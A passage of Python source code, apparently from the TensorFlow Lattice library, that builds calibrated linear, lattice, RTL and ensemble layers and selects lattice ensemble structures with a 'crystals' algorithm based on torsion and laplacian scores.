weak_idx)) else: raise ValueError('Unrecognized dominance type: {}'.format( dominance_config.dominance_type)) return monotonic_dominances def build_linear_layer(linear_input, feature_configs, model_config, weighted_average, submodel_index, dtype): """Creates a `tfl.layers.Linear` layer initialized to be an average. Args: linear_input: Input to the linear layer. feature_configs: A list of `tfl.configs.FeatureConfig` instances that specify configurations for each feature. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. weighted_average: If the linear coefficients should be positive and sum up to one. 
submodel_index: Corresponding index into submodels. dtype: dtype Returns: A `tfl.layers.Linear` instance. """ layer_name = '{}_{}'.format(LINEAR_LAYER_NAME, submodel_index) linear_input = tf.keras.layers.Concatenate(axis=1)(linear_input) num_input_dims = len(feature_configs) kernel_initializer = tf.keras.initializers.Constant([1.0 / num_input_dims] * num_input_dims) bias_initializer = tf.keras.initializers.Constant(0) if weighted_average: # Linear coefficients should be possitive and sum up to one. linear_monotonicities = [1] * num_input_dims normalization_order = 1 use_bias = False else: linear_monotonicities = _monotonicities_from_feature_configs( feature_configs) normalization_order = None use_bias = model_config.use_bias monotonic_dominances = _dominance_constraints_from_feature_configs( feature_configs) return linear_layer.Linear( num_input_dims=num_input_dims, monotonicities=linear_monotonicities, monotonic_dominances=monotonic_dominances, use_bias=use_bias, normalization_order=normalization_order, kernel_initializer=kernel_initializer, bias_initializer=bias_initializer, dtype=dtype, name=layer_name)( linear_input) def build_lattice_layer(lattice_input, feature_configs, model_config, layer_output_range, submodel_index, is_inside_ensemble, dtype): """Creates a `tfl.layers.Lattice` layer. Args: lattice_input: Input to the lattice layer. feature_configs: A list of `tfl.configs.FeatureConfig` instances that specify configurations for each feature. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. layer_output_range: A `tfl.premade_lib.LayerOutputRange` enum. submodel_index: Corresponding index into submodels. is_inside_ensemble: If this layer is inside an ensemble. dtype: dtype Returns: A `tfl.layers.Lattice` instance if `model_config.parameterization` is set to `'all_vertices'` or a `tfl.layers.KroneckerFactoredLattice` instance if set to `'kronecker_factored'`. Raises: ValueError: If `model_config.parameterization` is not one of `'all_vertices'` or `'kronecker_factored'`. """ layer_name = '{}_{}'.format(LATTICE_LAYER_NAME, submodel_index) (output_min, output_max, output_init_min, output_init_max) = _output_range(layer_output_range, model_config) feature_names = [feature_config.name for feature_config in feature_configs] lattice_sizes = [ feature_config.lattice_size for feature_config in feature_configs ] lattice_monotonicities = _monotonicities_from_feature_configs(feature_configs) lattice_unimodalities = [ feature_config.unimodality for feature_config in feature_configs ] lattice_regularizers = _lattice_regularizers(model_config, feature_configs) or None # Construct trust constraints within this lattice. 
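# Added note: the loop below gathers trust constraints as
# (main_feature_index, conditional_feature_index, direction) tuples, split
# into edgeworth_trusts and trapezoid_trusts by trust_config.trust_type, and
# logs a warning when a trapezoid constraint's "main" feature is absent from
# a lattice inside an ensemble.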
edgeworth_trusts = [] trapezoid_trusts = [] for conditional_idx, conditional_feature_config in enumerate(feature_configs): for trust_config in conditional_feature_config.reflects_trust_in or []: if trust_config.feature_name in feature_names: main_idx = feature_names.index(trust_config.feature_name) if trust_config.trust_type == 'edgeworth': edgeworth_trusts.append( (main_idx, conditional_idx, trust_config.direction)) elif trust_config.trust_type == 'trapezoid': trapezoid_trusts.append( (main_idx, conditional_idx, trust_config.direction)) else: raise ValueError('Unrecognized trust type: {}'.format( trust_config.trust_type)) elif is_inside_ensemble and trust_config.trust_type == 'trapezoid': logging.warning( 'A "main" feature (%s) for a trapezoid trust constraint is not ' 'present in a lattice that includes the "conditional" feature ' '(%s). In an ensemble model, this can result in constraint ' 'violations. Consider manually setting the ensemble structure if ' 'this constraint needs to be satisfied.', trust_config.feature_name, conditional_feature_config.name) monotonic_dominances = _dominance_constraints_from_feature_configs( feature_configs) if model_config.parameterization == 'all_vertices': layer_name = '{}_{}'.format(LATTICE_LAYER_NAME, submodel_index) kernel_initializer = lattice_layer.LinearInitializer( lattice_sizes=lattice_sizes, monotonicities=lattice_monotonicities, unimodalities=lattice_unimodalities, output_min=output_init_min, output_max=output_init_max) return lattice_layer.Lattice( lattice_sizes=lattice_sizes, monotonicities=lattice_monotonicities, unimodalities=lattice_unimodalities, edgeworth_trusts=edgeworth_trusts, trapezoid_trusts=trapezoid_trusts, monotonic_dominances=monotonic_dominances, output_min=output_min, output_max=output_max, clip_inputs=False, interpolation=model_config.interpolation, kernel_regularizer=lattice_regularizers, kernel_initializer=kernel_initializer, dtype=dtype, name=layer_name)( lattice_input) elif model_config.parameterization == 'kronecker_factored': layer_name = '{}_{}'.format(KFL_LAYER_NAME, submodel_index) kernel_initializer = kfll.KFLRandomMonotonicInitializer( monotonicities=lattice_monotonicities, init_min=output_init_min, init_max=output_init_max, seed=model_config.random_seed) scale_initializer = kfll.ScaleInitializer( output_min=output_min, output_max=output_max) return kfll.KroneckerFactoredLattice( lattice_sizes=lattice_sizes[0], num_terms=model_config.num_terms, monotonicities=lattice_monotonicities, output_min=output_min, output_max=output_max, clip_inputs=False, kernel_initializer=kernel_initializer, scale_initializer=scale_initializer, dtype=dtype, name=layer_name)( lattice_input) else: raise ValueError('Unknown type of parameterization: {}'.format( model_config.parameterization)) def build_lattice_ensemble_layer(submodels_inputs, model_config, dtype): """Creates an ensemble of `tfl.layers.Lattice` layers. Args: submodels_inputs: List of inputs to each of the lattice layers in the ensemble. The order corresponds to the elements of model_config.lattices. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. dtype: dtype Returns: A list of `tfl.layers.Lattice` instances. 
""" lattice_outputs = [] for submodel_index, (lattice_feature_names, lattice_input) in enumerate( zip(model_config.lattices, submodels_inputs)): lattice_feature_configs = [ model_config.feature_config_by_name(feature_name) for feature_name in lattice_feature_names ] lattice_layer_output_range = ( LayerOutputRange.INPUT_TO_FINAL_CALIBRATION if model_config.output_calibration else LayerOutputRange.MODEL_OUTPUT) lattice_outputs.append( build_lattice_layer( lattice_input=lattice_input, feature_configs=lattice_feature_configs, model_config=model_config, layer_output_range=lattice_layer_output_range, submodel_index=submodel_index, is_inside_ensemble=True, dtype=dtype)) return lattice_outputs def build_rtl_layer(calibration_outputs, model_config, submodel_index, average_outputs, dtype): """Creates a `tfl.layers.RTL` layer. This function expects that all features defined in model_config.feature_configs are used and present in calibration_outputs. Args: calibration_outputs: A mapping from feature name to calibration output. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. submodel_index: Corresponding index into submodels. average_outputs: Whether to average the outputs of this layer. dtype: dtype Returns: A `tfl.layers.RTL` instance. Raises: ValueError: If `model_config.parameterization` is not one of `'all_vertices'` or `'kronecker_factored'`. """ layer_name = '{}_{}'.format(RTL_LAYER_NAME, submodel_index) rtl_layer_output_range = ( LayerOutputRange.INPUT_TO_FINAL_CALIBRATION if model_config.output_calibration else LayerOutputRange.MODEL_OUTPUT) (output_min, output_max, output_init_min, output_init_max) = _output_range(rtl_layer_output_range, model_config) lattice_regularizers = _lattice_regularizers( model_config, model_config.feature_configs) or None rtl_inputs = collections.defaultdict(list) for feature_config in model_config.feature_configs: passthrough_name = '{}_{}'.format(RTL_INPUT_NAME, feature_config.name) calibration_output = tf.identity( calibration_outputs[feature_config.name], name=passthrough_name) if feature_config.monotonicity in [1, -1, 'increasing', 'decreasing']: rtl_inputs['increasing'].append(calibration_output) else: rtl_inputs['unconstrained'].append(calibration_output) lattice_size = model_config.feature_configs[0].lattice_size if model_config.parameterization == 'all_vertices': kernel_initializer = 'random_monotonic_initializer' elif model_config.parameterization == 'kronecker_factored': kernel_initializer = 'kfl_random_monotonic_initializer' else: raise ValueError('Unknown type of parameterization: {}'.format( model_config.parameterization)) return rtl_layer.RTL( num_lattices=model_config.num_lattices, lattice_rank=model_config.lattice_rank, lattice_size=lattice_size, output_min=output_min, output_max=output_max, init_min=output_init_min, init_max=output_init_max, random_seed=model_config.random_seed, clip_inputs=False, interpolation=model_config.interpolation, parameterization=model_config.parameterization, num_terms=model_config.num_terms, kernel_regularizer=lattice_regularizers, kernel_initializer=kernel_initializer, average_outputs=average_outputs, dtype=dtype, name=layer_name)( rtl_inputs) def build_calibrated_lattice_ensemble_layer(calibration_input_layer, model_config, average_outputs, dtype): """Creates a calibration layer followed by a lattice ensemble layer. Args: calibration_input_layer: A mapping from feature name to `tf.keras.Input`. 
model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. average_outputs: Whether to average the outputs of this layer. dtype: dtype Returns: A `tfl.layers.RTL` instance if model_config.lattices is 'rtl_layer. Otherwise a list of `tfl.layers.Lattice` instances. """ if model_config.lattices == 'rtl_layer': num_features = len(model_config.feature_configs) units = [1] * num_features if model_config.separate_calibrators: num_inputs = model_config.num_lattices * model_config.lattice_rank # We divide the number of inputs semi-evenly by the number of features. for i in range(num_features): units[i] = ((i + 1) * num_inputs // num_features - i * num_inputs // num_features) calibration_output_units = { feature_config.name: units[i] for i, feature_config in enumerate(model_config.feature_configs) } calibration_outputs = build_multi_unit_calibration_layers( calibration_input_layer=calibration_input_layer, calibration_output_units=calibration_output_units, model_config=model_config, layer_output_range=LayerOutputRange.INPUT_TO_LATTICE, output_single_tensor=True, dtype=dtype) lattice_outputs = build_rtl_layer( calibration_outputs=calibration_outputs, model_config=model_config, submodel_index=0, average_outputs=average_outputs, dtype=dtype) else: submodels_inputs = build_calibration_layers( calibration_input_layer=calibration_input_layer, model_config=model_config, layer_output_range=LayerOutputRange.INPUT_TO_LATTICE, submodels=model_config.lattices, separate_calibrators=model_config.separate_calibrators, dtype=dtype) lattice_outputs = build_lattice_ensemble_layer( submodels_inputs=submodels_inputs, model_config=model_config, dtype=dtype) if average_outputs: lattice_outputs = tf.keras.layers.Average()(lattice_outputs) return lattice_outputs def build_linear_combination_layer(ensemble_outputs, model_config, dtype): """Creates a `tfl.layers.Linear` layer initialized to be an average. Args: ensemble_outputs: Ensemble outputs to be linearly combined. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. dtype: dtype Returns: A `tfl.layers.Linear` instance. """ if isinstance(ensemble_outputs, list): num_input_dims = len(ensemble_outputs) linear_input = tf.keras.layers.Concatenate(axis=1)(ensemble_outputs) else: num_input_dims = int(ensemble_outputs.shape[1]) linear_input = ensemble_outputs kernel_initializer = tf.keras.initializers.Constant(1.0 / num_input_dims) bias_initializer = tf.keras.initializers.Constant(0) if (not model_config.output_calibration and model_config.output_min is None and model_config.output_max is None): normalization_order = None else: # We need to use weighted average to keep the output range. normalization_order = 1 # Bias term cannot be used when this layer should have bounded output. if model_config.use_bias: raise ValueError('Cannot use a bias term in linear combination with ' 'output bounds or output calibration') return linear_layer.Linear( num_input_dims=num_input_dims, monotonicities=['increasing'] * num_input_dims, normalization_order=normalization_order, use_bias=model_config.use_bias, kernel_initializer=kernel_initializer, bias_initializer=bias_initializer, dtype=dtype, name=OUTPUT_LINEAR_COMBINATION_LAYER_NAME)( linear_input) def build_output_calibration_layer(output_calibration_input, model_config, dtype): """Creates a monotonic output calibration layer with inputs range [0, 1]. 
Args: output_calibration_input: Input to the output calibration layer. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. dtype: dtype Returns: A `tfl.layers.PWLCalibration` instance. """ # kernel format: bias followed by diffs between consecutive keypoint outputs. kernel_init_values = np.ediff1d( model_config.output_initialization, to_begin=model_config.output_initialization[0]) input_keypoints = np.linspace(0.0, 1.0, num=len(kernel_init_values)) kernel_initializer = tf.keras.initializers.Constant(kernel_init_values) kernel_regularizer = _output_calibration_regularizers(model_config) return pwl_calibration_layer.PWLCalibration( input_keypoints=input_keypoints, output_min=model_config.output_min, output_max=model_config.output_max, kernel_initializer=kernel_initializer, kernel_regularizer=kernel_regularizer, monotonicity=1, input_keypoints_type=model_config.output_calibration_input_keypoints_type, dtype=dtype, name=OUTPUT_CALIB_LAYER_NAME)( output_calibration_input) def set_categorical_monotonicities(feature_configs): """Maps categorical monotonicities to indices based on specified vocab list. Args: feature_configs: A list of `tfl.configs.FeatureConfig` objects. """ if not isinstance(feature_configs, list) or any( not isinstance(fc, configs.FeatureConfig) for fc in feature_configs): raise ValueError( 'feature_configs must be a list of tfl.configs.FeatureConfig objects: ' '{}'.format(feature_configs)) for feature_config in feature_configs: if feature_config.num_buckets and isinstance(feature_config.monotonicity, list): # Make sure the vocabulary list exists. If not, assume user has already # properly set monotonicity as proper indices for this calibrator. if not feature_config.vocabulary_list: continue if not all( isinstance(m, (list, tuple)) and len(m) == 2 for m in feature_config.monotonicity): raise ValueError( 'Monotonicities should be a list of pairs (list/tuples): {}'.format( feature_config.monotonicity)) indexed_monotonicities = [] index_map = { category: index for (index, category) in enumerate(feature_config.vocabulary_list) } if feature_config.default_value is not None: index_map[feature_config.default_value] = feature_config.num_buckets - 1 for left, right in feature_config.monotonicity: for category in [left, right]: if category not in index_map: raise ValueError( 'Category `{}` not found in vocabulary list for feature `{}`' .format(category, feature_config.name)) indexed_monotonicities.append((index_map[left], index_map[right])) feature_config.monotonicity = indexed_monotonicities def set_random_lattice_ensemble(model_config, feature_names=None): """Sets random lattice ensemble in the given model_config. Args: model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. feature_names: A list of feature names. If not provided, feature names will be extracted from the feature configs contained in the model_config. """ if not isinstance(model_config, configs.CalibratedLatticeEnsembleConfig): raise ValueError( 'model_config must be a tfl.configs.CalibratedLatticeEnsembleConfig: {}' .format(type(model_config))) if model_config.lattices != 'random': raise ValueError('model_config.lattices must be set to \'random\'.') # Extract feature names if feature_names is None: if model_config.feature_configs is None: raise ValueError( 'Feature configs must be specified if feature names are not provided.' 
) feature_names = [ feature_config.name for feature_config in model_config.feature_configs ] # Start by using each feature once. np.random.seed(model_config.random_seed) model_config.lattices = [[] for _ in range(model_config.num_lattices)] for feature_name in feature_names: non_full_indices = [ i for (i, lattice) in enumerate(model_config.lattices) if len(lattice) < model_config.lattice_rank ] model_config.lattices[np.random.choice(non_full_indices)].append( feature_name) # Fill up lattices avoiding repeated features. for lattice in model_config.lattices: feature_names_not_in_lattice = [ feature_name for feature_name in feature_names if feature_name not in lattice ] remaining_size = model_config.lattice_rank - len(lattice) lattice.extend( np.random.choice( feature_names_not_in_lattice, size=remaining_size, replace=False)) def _add_pair_to_ensemble(lattices, lattice_rank, i, j): """Adds pair (i, j) to the ensemble heuristically.""" # First check if (i, j) pair is already present in a lattice. for lattice in lattices: if i in lattice and j in lattice: return # Try adding to a lattice that already has either i or j. for lattice in lattices: if len(lattice) < lattice_rank: if i in lattice: lattice.add(j) return if j in lattice: lattice.add(i) return # Add both i and j to a lattice that has enough space left. for lattice in lattices: if len(lattice) < lattice_rank - 1: lattice.add(i) lattice.add(j) return # Create a new lattice with pair (i, j). lattices.append(set([i, j])) def _set_all_pairs_cover_lattices(prefitting_model_config, feature_names): """Sets prefitting lattice ensemble such that it covers all feature pairs.""" # Pairs of co-occurrence that need to exist in the all-pairs cover. to_cover = list(itertools.combinations(range(len(feature_names)), 2)) np.random.seed(prefitting_model_config.random_seed) np.random.shuffle(to_cover) lattices = [] for (i, j) in to_cover: _add_pair_to_ensemble(lattices, prefitting_model_config.lattice_rank, i, j) prefitting_model_config.lattices = [ [feature_names[i] for i in lattice] for lattice in lattices ] def construct_prefitting_model_config(model_config, feature_names=None): """Constructs a model config for a prefitting model for crystal extraction. Args: model_config: Model configuration object describing model architecture. Should be a `tfl.configs.CalibratedLatticeEnsemble` instance. feature_names: A list of feature names. If not provided, feature names will be extracted from the feature configs contained in the model_config. Returns: A `tfl.configs.CalibratedLatticeEnsembleConfig` instance. """ if not isinstance(model_config, configs.CalibratedLatticeEnsembleConfig): raise ValueError( 'model_config must be a tfl.configs.CalibratedLatticeEnsembleConfig: {}' .format(type(model_config))) if model_config.lattices != 'crystals': raise ValueError('model_config.lattices must be set to \'crystals\'.') # Extract feature names from model_config if not provided. if feature_names is None: if model_config.feature_configs is None: raise ValueError( 'Feature configs must be specified if feature names are not provided.' ) feature_names = [ feature_config.name for feature_config in model_config.feature_configs ] # Make a copy of the model config provided and set all pairs covered. prefitting_model_config = copy.deepcopy(model_config) # Set parameterization of prefitting model to 'all_vertices' to extract # crystals using normal lattice because we do not have laplacian/torsion # regularizers for KFL. This should still extract could feature combinations. 
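# (The crystals scores computed by _get_torsions_and_laplacians below are
# torsion/laplacian regularizer values of the prefitted lattice kernels, and
# those regularizers operate on full 'all_vertices' lattice weights.)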
  prefitting_model_config.parameterization = 'all_vertices'
  _set_all_pairs_cover_lattices(
      prefitting_model_config=prefitting_model_config,
      feature_names=feature_names)
  # Trim the model for faster prefitting.
  for feature_config in prefitting_model_config.feature_configs:
    feature_config.lattice_size = 2
    # Unimodality requires lattice_size > 2.
    feature_config.unimodality = 0
    # Disable 2d constraints to avoid potential constraint violations.
    feature_config.dominates = None
    feature_config.reflects_trust_in = None
  # Return our properly constructed prefitting model config.
  return prefitting_model_config


def _verify_prefitting_model(prefitting_model, feature_names):
  """Checks that prefitting_model has the proper input layer."""
  if isinstance(prefitting_model, tf.keras.Model):
    layer_names = [layer.name for layer in prefitting_model.layers]
  elif isinstance(prefitting_model, tf.estimator.Estimator):
    layer_names = prefitting_model.get_variable_names()
  else:
    raise ValueError('Invalid model type for prefitting_model: {}'.format(
        type(prefitting_model)))
  for feature_name in feature_names:
    if isinstance(prefitting_model, tf.keras.Model):
      input_layer_name = '{}_{}'.format(INPUT_LAYER_NAME, feature_name)
      if input_layer_name not in layer_names:
        raise ValueError(
            'prefitting_model does not match prefitting_model_config. Make '
            'sure that prefitting_model is the proper type and constructed '
            'from the prefitting_model_config: {}'.format(
                type(prefitting_model)))
    else:
      pwl_input_layer_name = '{}_{}/{}'.format(
          CALIB_LAYER_NAME, feature_name,
          pwl_calibration_layer.PWL_CALIBRATION_KERNEL_NAME)
      cat_input_layer_name = '{}_{}/{}'.format(
          CALIB_LAYER_NAME, feature_name,
          categorical_calibration_layer.CATEGORICAL_CALIBRATION_KERNEL_NAME)
      if (pwl_input_layer_name not in layer_names and
          cat_input_layer_name not in layer_names):
        raise ValueError(
            'prefitting_model does not match prefitting_model_config. Make '
            'sure that prefitting_model is the proper type and constructed '
            'from the prefitting_model_config: {}'.format(
                type(prefitting_model)))


def _get_lattice_weights(prefitting_model, lattice_index):
  """Gets the weights of the lattice at the specified index."""
  if isinstance(prefitting_model, tf.keras.Model):
    lattice_layer_name = '{}_{}'.format(LATTICE_LAYER_NAME, lattice_index)
    weights = tf.keras.backend.get_value(
        prefitting_model.get_layer(lattice_layer_name).weights[0])
  else:
    # We have already checked the types by this point, so if prefitting_model
    # is not a keras Model it must be an Estimator.
    lattice_kernel_variable_name = '{}_{}/{}'.format(
        LATTICE_LAYER_NAME, lattice_index, lattice_layer.LATTICE_KERNEL_NAME)
    weights = prefitting_model.get_variable_value(lattice_kernel_variable_name)
  return weights


def _get_torsions_and_laplacians(prefitting_model_config, prefitting_model,
                                 feature_names):
  """Returns average torsion and laplacian regularizers in prefitted model."""
  num_features = len(feature_names)
  laplacians = [[] for _ in range(num_features)]
  torsions = [[[] for _ in range(num_features)] for _ in range(num_features)]
  for (lattice_index, lattice) in enumerate(prefitting_model_config.lattices):
    # Get lattice weights and normalize them.
    weights = _get_lattice_weights(prefitting_model, lattice_index)
    weights -= np.min(weights)
    weights /= np.max(weights)
    weights = tf.constant(weights)
    # Convert feature names in the lattice to their index in feature_names.
    lattice = [feature_names.index(feature_name) for feature_name in lattice]
    lattice_sizes = [2] * len(lattice)
    # feature_* refers to feature index in feature_names.
# within_lattice_index_* is the index of input dimenstion of the lattice. for within_lattice_index_0, feature_0 in enumerate(lattice): l2 = [0] * len(lattice) l2[within_lattice_index_0] = 1 laplacians[feature_0].append( lattice_lib.laplacian_regularizer( weights=weights, lattice_sizes=lattice_sizes, l2=l2)) for within_lattice_index_1, feature_1 in enumerate(lattice): if within_lattice_index_1 > within_lattice_index_0: l2 = [0] * len(lattice) l2[within_lattice_index_0] = 1 l2[within_lattice_index_1] = 1 torsion = lattice_lib.torsion_regularizer( weights=weights, lattice_sizes=lattice_sizes, l2=l2) torsions[feature_0][feature_1].append(torsion) torsions[feature_1][feature_0].append(torsion) if not tf.executing_eagerly(): with tf.compat.v1.Session() as sess: laplacians = sess.run(laplacians) torsions = sess.run(torsions) laplacians = [np.mean(v) for v in laplacians] torsions = [[np.mean(v) if v else 0.0 for v in row] for row in torsions] return torsions, laplacians def _get_final_crystal_lattices(model_config, prefitting_model_config, prefitting_model, feature_names): """Extracts the lattice ensemble structure from the prefitting model.""" torsions, laplacians = _get_torsions_and_laplacians( prefitting_model_config=prefitting_model_config, prefitting_model=prefitting_model, feature_names=feature_names) # Calculate features' importance_score = lambda * laplacians + torsion. # Used to allocate slots to useful features with more non-linear interactions. num_features = len(feature_names) importance_scores = np.array(laplacians) * _LAPLACIAN_WEIGHT_IN_IMPORTANCE for feature_0, feature_1 in itertools.combinations(range(num_features), 2): importance_scores[feature_0] += torsions[feature_0][feature_1] importance_scores[feature_1] += torsions[feature_0][feature_1] # Each feature is used at least once, and the remaining slots are distributed # proportional to the importance_scores. features_uses = [1] * num_features total_feature_use = model_config.num_lattices * model_config.lattice_rank remaining_uses = total_feature_use - num_features remaining_scores = np.sum(importance_scores) for feature in np.argsort(-importance_scores): added_uses = int( round(remaining_uses * importance_scores[feature] / remaining_scores)) # Each feature cannot be used more than once in a finalized lattice. added_uses = min(added_uses, model_config.num_lattices - 1) features_uses[feature] += added_uses remaining_uses -= added_uses remaining_scores -= importance_scores[feature] assert np.sum(features_uses) == total_feature_use # Add features to add list in round-robin order. add_list = [] for use in range(1, max(features_uses) + 1): for feature_index, feature_use in enumerate(features_uses): if use <= feature_use: add_list.append(feature_index) assert len(add_list) == total_feature_use # Setup initial lattices that will be optimized by swapping later. lattices = [[] for _ in range(model_config.num_lattices)] cooccurrence_counts = [[0] * num_features for _ in range(num_features)] for feature_to_be_added in add_list: # List of pairs of (addition_score, candidate_lattice_to_add_to). score_candidates_pairs = [] for candidate_lattice_to_add_to in range(model_config.num_lattices): # addition_score indicates the priority of an addition. 
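# For a non-empty, non-repeating candidate lattice the score is the
# discounted torsion gained by adding the feature:
#   sum(torsions[feature_to_be_added][other] *
#       _REPEATED_PAIR_DISCOUNT_IN_CRYSTALS_SCORE **
#       cooccurrence_counts[feature_to_be_added][other]
#       for other in lattices[candidate_lattice_to_add_to])
# Full lattices (-2.0) and repeated features (-1.0) get sentinel scores so
# they are only picked as a last resort; repeats are fixed by the swapping
# pass that follows.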
if len( lattices[candidate_lattice_to_add_to]) >= model_config.lattice_rank: # going out of bound on the lattice addition_score = -2.0 elif feature_to_be_added in lattices[candidate_lattice_to_add_to]: # repeates (fixed repeats later by swapping) addition_score = -1.0 elif not lattices[candidate_lattice_to_add_to]: # adding a new lattice roughly has an "average" lattice score addition_score = np.mean(torsions) * model_config.lattice_rank**2 / 2 else: # all other cases: change in total discounted torsion after addition. addition_score = 0.0 for other_feature in lattices[candidate_lattice_to_add_to]: addition_score += ( torsions[feature_to_be_added][other_feature] * _REPEATED_PAIR_DISCOUNT_IN_CRYSTALS_SCORE **(cooccurrence_counts[feature_to_be_added][other_feature])) score_candidates_pairs.append( (addition_score, candidate_lattice_to_add_to)) # Use the highest scoring addition. score_candidates_pairs.sort(reverse=True) best_candidate_lattice_to_add_to = score_candidates_pairs[0][1] for other_feature in lattices[best_candidate_lattice_to_add_to]: cooccurrence_counts[feature_to_be_added][other_feature] += 1 cooccurrence_counts[other_feature][feature_to_be_added] += 1 lattices[best_candidate_lattice_to_add_to].append(feature_to_be_added) # Apply swapping operations to increase within-lattice torsion. changed = True iteration = 0 while changed: if iteration > _MAX_CRYSTALS_SWAPS: logging.info('Crystals algorithm did not fully converge.') break changed = False iteration += 1 for lattice_0, lattice_1 in itertools.combinations(lattices, 2): # For every pair of lattices: lattice_0, lattice_1 for index_0, index_1 in itertools.product( range(len(lattice_0)), range(len(lattice_1))): # Consider swapping lattice_0[index_0] with lattice_1[index_1] rest_lattice_0 = list(lattice_0) rest_lattice_1 = list(lattice_1) feature_0 = rest_lattice_0.pop(index_0) feature_1 = rest_lattice_1.pop(index_1) if feature_0 == feature_1: continue # Calculate the change in the overall discounted sum of torsion terms. added_cooccurrence = set( [tuple(sorted((feature_1, other))) for other in rest_lattice_0] + [tuple(sorted((feature_0, other))) for other in rest_lattice_1]) removed_cooccurrence = set( [tuple(sorted((feature_0, other))) for other in rest_lattice_0] + [tuple(sorted((feature_1, other))) for other in rest_lattice_1]) wash = added_cooccurrence.intersection(removed_cooccurrence) added_cooccurrence = added_cooccurrence.difference(wash) removed_cooccurrence = removed_cooccurrence.difference(wash) swap_diff_torsion = ( sum(torsions[i][j] * _REPEATED_PAIR_DISCOUNT_IN_CRYSTALS_SCORE** cooccurrence_counts[i][j] for (i, j) in added_cooccurrence) - sum(torsions[i][j] * _REPEATED_PAIR_DISCOUNT_IN_CRYSTALS_SCORE** (cooccurrence_counts[i][j] - 1) for (i, j) in removed_cooccurrence)) # Swap if a feature is repeated or if the score change is positive. if (feature_0 not in lattice_1 and feature_1 not in lattice_0 and (lattice_0.count(feature_0) > 1 or lattice_1.count(feature_1) > 1 or swap_diff_torsion > 0)): for (i, j) in added_cooccurrence: cooccurrence_counts[i][j] += 1 cooccurrence_counts[j][i] += 1 for (i, j) in removed_cooccurrence: cooccurrence_counts[i][j] -= 1 cooccurrence_counts[j][i] -= 1 lattice_0[index_0], lattice_1[index_1] = (lattice_1[index_1], lattice_0[index_0]) changed = True # Return the extracted lattice structure. 
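# `lattices` is a list of `model_config.num_lattices` lists of feature
# indices into `feature_names`, each of length `model_config.lattice_rank`;
# set_crystals_lattice_ensemble maps these indices back to feature names.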
return lattices def set_crystals_lattice_ensemble(model_config, prefitting_model_config, prefitting_model, feature_names=None): """Extracts crystals from a prefitting model and finalizes model_config. Args: model_config: Model configuration object describing model architecture. Should be a `tfl.configs.CalibratedLatticeEnsemble` instance. prefitting_model_config: Model configuration object describing prefitting model architecture. Should be a `tfl.configs.CalibratedLatticeEnsemble` insance constructed using `tfl.premade_lib.construct_prefitting_model_config`. prefitting_model: A trained `tfl.premade.CalibratedLatticeEnsemble`, `tfl.estimators.CannedEstimator`, `tfl.estimators.CannedClassifier`, or `tfl.estiamtors.CannedRegressor` instance. feature_names: A list of feature names. If not provided, feature names will be extracted from the feature configs contained in the model_config. """ # Error checking parameter types. if not isinstance(model_config, configs.CalibratedLatticeEnsembleConfig): raise ValueError( 'model_config must be a tfl.configs.CalibratedLatticeEnsembleConfig: {}' .format(type(model_config))) if not isinstance(prefitting_model_config, configs.CalibratedLatticeEnsembleConfig): raise ValueError('prefitting_model_config must be a ' 'tfl.configs.CalibratedLatticeEnsembleConfig: {}'.format( type(model_config))) if model_config.lattices != 'crystals': raise ValueError('model_config.lattices must be set to \'crystals\'.') # Note that we cannot check the type of the prefitting model without importing # premade/estimators, which would cause a cyclic dependency. However, we can # check that the model is a tf.keras.Model or tf.Estimator instance that has # the proper input layers matching prefitting_model_config feature_configs. # Beyond that, a prefitting_model with proper input layer names that is not of # the proper type will have undefined behavior. # To perform this check, we must first extract feature names if they are not # provided, which we need for later steps anyway. if feature_names is None: if model_config.feature_configs is None: raise ValueError( 'Feature configs must be specified if feature names are not provided.' ) feature_names = [ feature_config.name for feature_config in model_config.feature_configs ] _verify_prefitting_model(prefitting_model, feature_names) # Now we can extract the crystals and finalize model_config. lattices = _get_final_crystal_lattices( model_config=model_config, prefitting_model_config=prefitting_model_config, prefitting_model=prefitting_model, feature_names=feature_names) model_config.lattices = [[ feature_names[features_index] for features_index in lattice ] for lattice in lattices] def _verify_ensemble_config(model_config): """Verifies that an ensemble model and feature configs are properly specified. Args: model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. Raises: ValueError: If `model_config.lattices` is set to 'rtl_layer' and `model_config.num_lattices` is not specified. ValueError: If `model_config.num_lattices < 2`. ValueError: If `model_config.lattices` is set to 'rtl_layer' and `lattice_size` is not the same for all features. ValueError: If `model_config.lattices` is set to 'rtl_layer' and there are features with unimodality constraints. ValueError: If `model_config.lattices` is set to 'rtl_layer' and there are features with trust constraints. ValueError: If `model_config.lattices` is set to 'rtl_layer' and there are features with dominance constraints. 
ValueError: If `model_config.lattices` is set to 'rtl_layer' and there are per-feature lattice regularizers. ValueError: If `model_config.lattices` is not iterable or constaints non-string values. ValueError: If `model_config.lattices` is not set to 'rtl_layer' or a fully specified list of lists of feature names. """ if model_config.lattices == 'rtl_layer': # RTL must have num_lattices specified and >= 2. if model_config.num_lattices is None: raise ValueError('model_config.num_lattices must be specified when ' 'model_config.lattices is set to \'rtl_layer\'.') if model_config.num_lattices < 2: raise ValueError( 'CalibratedLatticeEnsemble must have >= 2 lattices. For single ' 'lattice models, use CalibratedLattice instead.') # Check that all lattices sizes for all features are the same. if any(feature_config.lattice_size != model_config.feature_configs[0].lattice_size for feature_config in model_config.feature_configs): raise ValueError('RTL Layer must have the same lattice size for all ' 'features.') # Check that there are only monotonicity and bound constraints. if any( feature_config.unimodality != 'none' and feature_config.unimodality != 0 for feature_config in model_config.feature_configs): raise ValueError( 'RTL Layer does not currently support unimodality constraints.') if any(feature_config.reflects_trust_in is not None for feature_config in model_config.feature_configs): raise ValueError( 'RTL Layer does not currently support trust constraints.') if any(feature_config.dominates is not None for feature_config in model_config.feature_configs): raise ValueError( 'RTL Layer does not currently support dominance constraints.') # Check that there are no per-feature lattice regularizers. for feature_config in model_config.feature_configs: for regularizer_config in feature_config.regularizer_configs or []: if not regularizer_config.name.startswith( _INPUT_CALIB_REGULARIZER_PREFIX): raise ValueError( 'RTL Layer does not currently support per-feature lattice ' 'regularizers.') elif isinstance(model_config.lattices, list): # Make sure there are more than one 